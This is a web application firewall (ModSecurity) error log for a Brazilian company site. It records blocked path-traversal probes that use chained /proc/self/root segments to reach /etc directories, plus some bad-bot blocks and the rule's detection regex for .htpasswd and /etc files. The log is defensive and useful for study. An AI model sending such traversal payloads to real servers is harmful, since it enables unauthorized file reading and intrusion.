"WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf9BwlT9VtDQc7bgUyazgAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:52:28.203100 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.243.203:34488] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf9DLABkC4fWIHEf8HZ-gAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:52:32.867771 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.243.203:34498] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf9ENSswJuvopo3lOhOiQAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:52:36.408717 2026] [:error] [pid 10709:tid 140411582465792] [client 74.7.243.203:38882] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf9FBXjF1vJNtV6CWrnnAAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:52:38.791068 2026] [:error] [pid 21533:tid 140411691570944] [client 74.7.243.203:38896] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf9FnjZBu2q05ozVU9ExQAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:52:39.351677 2026] [:error] [pid 10772:tid 140411699963648] [client 74.7.241.46:60940] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf9F_9ocpUE4ed4uDzcUgAAAgU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 09:52:42.303796 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.243.203:36326] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf9GrABkC4fWIHEf8HaAAAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:52:43.643146 2026] [:error] [pid 21946:tid 140411540502272] [client 74.7.243.203:36330] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf9G3bQATo66fKoS7w74wAAANg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:52:48.362868 2026] [:error] [pid 32654:tid 140411741927168] [client 74.7.243.203:36336] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf9IAlT9VtDQc7bgUya3gAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:52:50.764494 2026] [:error] [pid 21806:tid 140411699963648] [client 74.7.243.203:36342] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf9ItSswJuvopo3lOhOmQAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:53:11.583692 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.241.46:40246] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf9N9SswJuvopo3lOhOqwAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:53:14.931003 2026] [:error] [pid 32654:tid 140411616036608] [client 74.7.241.46:57620] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf9OglT9VtDQc7bgUya6gAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 09:53:17.655069 2026] [:error] [pid 10709:tid 140411658000128] [client 74.7.244.31:48278] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abf9PRXjF1vJNtV6CWrnqAAAAco"]
[Mon Mar 16 09:53:17.657256 2026] [:error] [pid 10709:tid 140411666392832] [client 74.7.241.46:57626] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf9PBXjF1vJNtV6CWrnpgAAAck"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:55:51.263382 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.228.16:39140] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abf917ABkC4fWIHEf8HajAAAAFg"]
[Mon Mar 16 09:56:17.287753 2026] [:error] [pid 10831:tid 140411708356352] [client 74.7.243.203:43188] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf98Y6lpbStxTqkSktebAAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:58:18.347857 2026] [:error] [pid 32654:tid 140411641214720] [client 74.7.244.31:49626] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abf-aglT9VtDQc7bgUybYAAAAQw"]
[Mon Mar 16 09:59:55.941389 2026] [:error] [pid 32654:tid 140411649607424] [client 74.7.241.46:36302] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf-ywlT9VtDQc7bgUyb7gAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:59:57.387329 2026] [:error] [pid 10651:tid 140411674785536] [client 74.7.241.46:60950] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf-zbysWC90G-1nBrA1LwAAAYg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:00:52.353315 2026] [:error] [pid 10709:tid 140411674785536] [client 74.7.228.16:47912] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abf_BBXjF1vJNtV6CWrpEAAAAcg"]
[Mon Mar 16 10:01:01.878555 2026] [:error] [pid 21946:tid 140411649607424] [client 74.7.241.46:38928] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_DXbQATo66fKoS7w9EQAAAMs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:01:03.279776 2026] [:error] [pid 21533:tid 140411649607424] [client 74.7.241.46:38142] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_D3jZBu2q05ozVU9GIQAAAUs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:01:07.671491 2026] [:error] [pid 32654:tid 140411599251200] [client 74.7.241.46:38144] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_EwlT9VtDQc7bgUycIQAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:01:10.059531 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.241.46:50846] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_Fv9ocpUE4ed4uDzc8QAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:01:13.618282 2026] [:error] [pid 10831:tid 140411666392832] [client 74.7.241.46:50858] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_GY6lpbStxTqkSkte0QAAAkk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
